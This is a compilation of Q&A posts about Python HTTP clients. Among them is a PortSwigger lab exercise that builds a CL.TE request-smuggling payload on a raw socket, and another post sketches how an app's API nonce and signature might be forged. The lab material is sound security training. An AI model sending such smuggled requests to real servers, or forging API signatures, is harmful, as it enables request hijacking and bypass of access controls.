I am requesting PDF binary content from a Tomcat web service from a Python web application server.
We have implemented a two-attempt retry in Python, like this. Once in a while we get an HTTP 500 response. This issue is being investigated; it is very likely an environment issue related to insufficient resources, such as the maximum number of processes being reached. On the next retry, more often than not, we get an HTTP 200 with partial blob content (i.e. without the EOF marker in the PDF). How is that possible?
Are there any flaws in this retry logic? How an HTTP 200 response can have incomplete data is beyond my understanding. Is the HTTP 200 sent first and then the real data (which would mean the server could die after it sent the HTTP 200)? The only other explanation is that the server is sending the entire content, but the program generating the data is producing incomplete data due to some resource issue, which might also have caused the HTTP 500.
# There is a unique id as well to make it a new request. (retries is 2 by default)
while retries:
    try:
        req = urllib2.Request(url, data=input_html)
        req.add_header('Accept', 'application/pdf')
        req.add_header('Content-Type', 'text/html')
        handle = urllib2.urlopen(req)
        pdf_blob = handle.read()
        break  # success; exit the retry loop
    except:
        log(traceback)
        retries = retries - 1
        if not retries:
            raise
Architecture is as follows:
Web Application -> Calls Tomcat -> Gets PDF -> Stores To DB.
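For what it's worth, HTTP does send the status line and headers before the body, so the server (or the process feeding it) can die mid-stream after the client has already seen the 200. A minimal sketch of a retry loop that also treats a truncated body as a failure by checking for the PDF `%%EOF` trailer; `fetch` here is a hypothetical stand-in for the urllib2 call above:

```python
import time

def looks_complete(blob):
    # A structurally complete PDF ends with a %%EOF marker (possibly
    # followed by whitespace), so a truncated body usually lacks it.
    return b"%%EOF" in blob[-1024:]

def fetch_pdf(fetch, retries=2, delay=1.0):
    # Key additions over the original loop: break out on success,
    # and treat a 200 response with a truncated body as a failure too.
    while retries:
        try:
            blob = fetch()
            if looks_complete(blob):
                return blob
            raise IOError("truncated PDF body")
        except Exception:
            retries -= 1
            if not retries:
                raise
            time.sleep(delay)
```

The same validation should run before the blob is stored to the DB, so a truncated 200 never gets persisted.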
I am trying to write a Python script containing a somewhat unusual HTTP request as part of learning about web attacks and solving the lab at
https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te.
There, I need to issue a request containing both a Content-Length and a Transfer-Encoding header that are in disagreement.
My basic and still unmanipulated request looks like this and works as expected:
with requests.Session() as client:
    client.verify = False
    client.proxies = proxies
    [...]
    data = '0\r\n\r\nX'
    req = requests.Request('POST', host, data=data)
    prep = client.prepare_request(req)
    client.send(prep)
[...]
Content-Length: 6\r\n
\r\n
0\r\n
\r\n
X
However, as soon as I add the Transfer-Encoding header, the request itself gets modified.
data = '0\r\n\r\nX'
req = requests.Request('POST', host, data=data)
prep = client.prepare_request(req)
prep.headers['Transfer-Encoding'] = 'chunked'
client.send(prep)
The request that is actually sent down the wire is
[...]
Content-Length: 0\r\n
\r\n
whereas the expected request would be
[...]
Content-Length: 6\r\n
Transfer-Encoding: chunked\r\n
\r\n
0\r\n
\r\n
X
The same thing happens if I flip things around, prepare a chunked request and modify the Content-Length header afterwards:
def gen():
    yield b'0\r\n'
    yield b'\r\n'
    yield b'X'
req = requests.Request('POST', host, data=gen())
prep = client.prepare_request(req)
prep.headers['Content-Length'] = '6'
client.send(prep)
Basically, the Transfer-Encoding header gets removed completely, the data is reinterpreted according to the chunking and the Content-Length header gets recalculated to match.
I was under the impression that preparing a request and manipulating its content before sending should send the modified content, but either this is a wrong assumption or I do things horribly wrong.
Is sending such a request possible this way or do I have to go onto a lower level to put arbitrary data on the wire?
requests is a good HTTP client, and as such it will prevent you from generating bad HTTP requests, since bad HTTP requests result in 400 errors in many cases.
To generate syntax errors in HTTP requests you need to avoid using high-level HTTP clients (like a browser, but also an HTTP library). Instead you need to go down to TCP/IP socket management (and maybe SSL as well) and write the full HTTP protocol with your own code, no library.
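A sketch of that lower level: the conflicting headers are written by hand as bytes, so nothing can normalize them. The PortSwigger labs are served over HTTPS, so the socket is wrapped in TLS before sending; path and port are assumptions.

```python
import socket
import ssl

def build_smuggled_request(host):
    # Hand-built CL.TE request: Content-Length says the body is 6 bytes,
    # while Transfer-Encoding: chunked says it is an empty terminating
    # chunk followed by a stray 'X'. No client library touches this.
    body = b"0\r\n\r\nX"
    return (
        b"POST / HTTP/1.1\r\n"
        + b"Host: " + host.encode() + b"\r\n"
        + b"Content-Length: " + str(len(body)).encode() + b"\r\n"
        + b"Transfer-Encoding: chunked\r\n"
        + b"\r\n" + body
    )

def send_raw(host, port=443):
    raw = socket.create_connection((host, port))
    # Wrap in TLS for the HTTPS lab endpoint, then send the raw bytes.
    sock = ssl.create_default_context().wrap_socket(raw, server_hostname=host)
    sock.sendall(build_smuggled_request(host))
    return sock.recv(4096)
```

For the lab you would call `send_raw` with your lab's hostname and inspect the returned status line.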
I am trying to automate a web-based analysis that requires two input files and a DNA sequence string as input.
I have a lot of files and DNA sequences that I would like to analyze.
If I manually fill in the form on the website, it works nicely.
However, if I use the following script, it gives a "413 Request Entity Too Large" error message.
How can I overcome this?
import requests
import gzip
url = "http://www.rgenome.net/cas-analyzer/#!"
s = requests.session()
r1 = s.get(url)
print(r1.cookies)
csrf_token = r1.cookies['csrftoken']
R1 = gzip.open("R1_001.fastq.gz", 'rt')
R2 = gzip.open("R2_001.fastq.gz", 'rt')
data = {'csrfmiddlewaretoken': csrf_token, 'file1': R1, 'file2': R2, 'fullseq': "atggccggttaaggttaaagg", 'rgneweq': 'atgccat'}
r2 = s.post(url=url, data=data, headers={'Content-Type': 'application/x-www-form-urlencoded'})
print(r2)
print(r2.text)
R1.close()
R2.close()
I have tried this:
R1 = open("R1_001.fastq.gz", 'rb')
R2 = open("R2_001.fastq.gz", 'rb')
But it doesn't make any difference.
The server is not under my control. The funny thing is that I can do it manually on the web page, but I cannot do it with the script.
A 413 Request Entity Too Large error occurs when a request made by a client is too large for the web server to process.
If your web server sets a particular HTTP request size limit, clients may come across a 413 Request Entity Too Large response; in this case, when uploading a large file.
If you are the one controlling the web server, you might want to adjust the parameters in the web server config.
Sample Example
NGINX
server {
    client_max_body_size 100M;
    ...
}
APACHE
LimitRequestBody 104857600
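Separately from the server-side limit, note that the script passes open file handles in `data=`, which makes requests url-encode the file contents into the form body; a browser form upload is almost certainly multipart/form-data. A sketch using `files=` instead, where the field names are assumptions copied from the question's script, not confirmed names from the server:

```python
import io
import requests

def build_upload(url, r1, r2, token):
    # Files go in `files=` so requests builds a multipart/form-data body
    # and sets the Content-Type header (with boundary) itself; do not set
    # Content-Type by hand.
    req = requests.Request(
        "POST", url,
        data={"csrfmiddlewaretoken": token,
              "fullseq": "atggccggttaaggttaaagg",
              "rgneweq": "atgccat"},
        files={"file1": ("R1_001.fastq.gz", r1),
               "file2": ("R2_001.fastq.gz", r2)},
    )
    return req.prepare()

prep = build_upload("http://www.rgenome.net/cas-analyzer/",
                    io.BytesIO(b"reads1"), io.BytesIO(b"reads2"), "tok")
print(prep.headers["Content-Type"].split(";")[0])  # multipart/form-data
```

In the real script you would open the `.fastq.gz` files in `'rb'` mode and pass the prepared request to `session.send(prep)`.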
I captured this HTTPS request from my Android phone.
GET https://picaapi.picacomic.com/init?platform=android HTTP/1.1
accept: application/vnd.picacomic.com.v1+json
time: 1579258278
nonce: b4cf4158c0da4a70b4b7e58a0b0b5a55
signature: 65448a52a6d19ceecf21d249ae25e564b61425b4d371f6a20fb4fcbbb9131d9d
app-version: 2.2.1.3.3.4
After replaying it in Fiddler several times, it became obvious that the site checks these two values, 'nonce' and 'signature', before giving a response; otherwise the response only contains an error code. Since I want to use this API to request content from the site, I need to know how these two values are generated.
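I don't know this API's actual scheme, but headers like these typically come from an HMAC computed inside the app over fields such as the request path, timestamp, and nonce, using a secret baked into the APK (which you would have to recover by decompiling it). A purely hypothetical sketch of that pattern; the key, field order, and hash choice are guesses, not this site's real algorithm:

```python
import hashlib
import hmac
import time
import uuid

def sign(path, secret):
    # Hypothetical scheme: HMAC-SHA256 over path + timestamp + nonce.
    ts = str(int(time.time()))
    nonce = uuid.uuid4().hex          # 32 hex chars, like the capture
    msg = (path + ts + nonce).lower().encode()
    sig = hmac.new(secret.encode(), msg, hashlib.sha256).hexdigest()
    return {"time": ts, "nonce": nonce, "signature": sig}
```

Comparing the header lengths in the capture (32-hex nonce, 64-hex signature) is what suggests a UUID nonce and a SHA-256-sized digest; everything else has to come from the app's code.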
According to the Microsoft documentation, I have to follow the steps below:
If the listener service successfully validates the URL, it returns a
success response within 5 seconds as follows:
Sets the content type in the response header to text/plain.
Includes the same validation token in the response body.
Returns an HTTP 200 response code. The listener can discard the validation token subsequently.
My endpoint looks like this:
@app.route('/outlook/push', methods=['POST'])
def outlook_push():
    return (request.args.get('validationtoken'), 200, {'Content-Type': 'plain/text'})
but this exceeds the time limit (5 seconds).
I am getting an error like this:
{'error': {'code': 'ErrorInvalidParameter', 'message': "Notification URL 'https://5cbae04e.ngrok.io/outlook/push?validationtoken=NmIzZDJiMTMtZjhmNy00ZWMwLTg1MDctNDQwMDQ0OWM2NmE1' verification failed 'System.Net.WebException: The operation has timed out\r\n at System.Net.HttpWebRequest.GetResponse()\r\n at Microsoft.Exchange.OData.Model.Notifications.PushNotification.PushSubscriptionCallbackUrlValidationHelper.SendRequestAndVerifyResponse(Uri callbackUrl, PushSubscription pushSubscription)'."}}
Is there any way to increase the time limit?
I don't think it can be changed. Your problem is probably that your route is defined to accept only the POST method, while Office 365 makes a GET request there :)
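A sketch of the endpoint with that fixed — accept GET for the validation handshake (keeping POST for the notifications themselves), and note the content type is `text/plain`, not `plain/text` as in the original code:

```python
from flask import Flask, request

app = Flask(__name__)

# Accept GET so the validation request succeeds, and echo the token
# back as text/plain within the 5-second window.
@app.route('/outlook/push', methods=['GET', 'POST'])
def outlook_push():
    token = request.args.get('validationtoken', '')
    return token, 200, {'Content-Type': 'text/plain'}
```

Real notifications arrive as POSTs without a validation token, so a production handler would branch on that.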
I'm trying to use the Python requests library to send an Android .apk file to an API service. I've successfully used requests with this file type to submit to another service, but I keep getting a:
ConnectionError(MaxRetryError("HTTPSConnectionPool(host='REDACTED', port=443): Max retries exceeded with url: /upload/app (Caused by : [WinError 10054] An existing connection was forcibly closed by the remote host)",),)
This is the code responsible:
url = "https://website"
files = {'file': open(app, 'rb')}
headers = {'user': 'value', 'pass': 'value'}
try:
    response = requests.post(url, files=files, headers=headers)
    jsonResponse = json.loads(response.text)
    if 'error' in jsonResponse:
        logger.error(jsonResponse['error'])
except Exception as e:
    logger.error("Exception when trying to upload app to host")
The response line is throwing the above-mentioned exception. I've used these exact same parameters in the Chrome Postman extension to replicate the POST request, and it works perfectly. I've uploaded the exact same kind of file to another RESTful service as well. The only difference between this request and the ones that work is that this one attaches custom headers in order to authenticate the POST. The API doesn't stipulate this as authentication in the sense of needing to be encoded, and its examples, both in HTTP and cURL, define these values as headers (-H).
Any help would be most appreciated!
So this was indeed a certificate issue. In my case I was able to stay internal to my company and connect to another URL, but the requests library, which is quite amazing, has information on certs at: http://docs.python-requests.org/en/latest/user/advanced/?highlight=certs
For all intents and purposes this is answered, but perhaps it will be useful to someone in posterity.
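For posterity, these are the knobs requests exposes for that; the paths are placeholders, a sketch rather than the poster's actual fix:

```python
import requests

# Point requests at a corporate CA bundle instead of the default
# certifi one; the path is a placeholder.
session = requests.Session()
session.verify = "/path/to/corporate-ca-bundle.pem"

# If the server also demands a client certificate:
# session.cert = ("client.crt", "client.key")

# Every request made through this session now uses those settings, e.g.:
# session.post("https://website/upload/app", files={"file": open(app, "rb")})
```

Setting these on a Session applies them to all requests made through it, which avoids repeating `verify=` on every call.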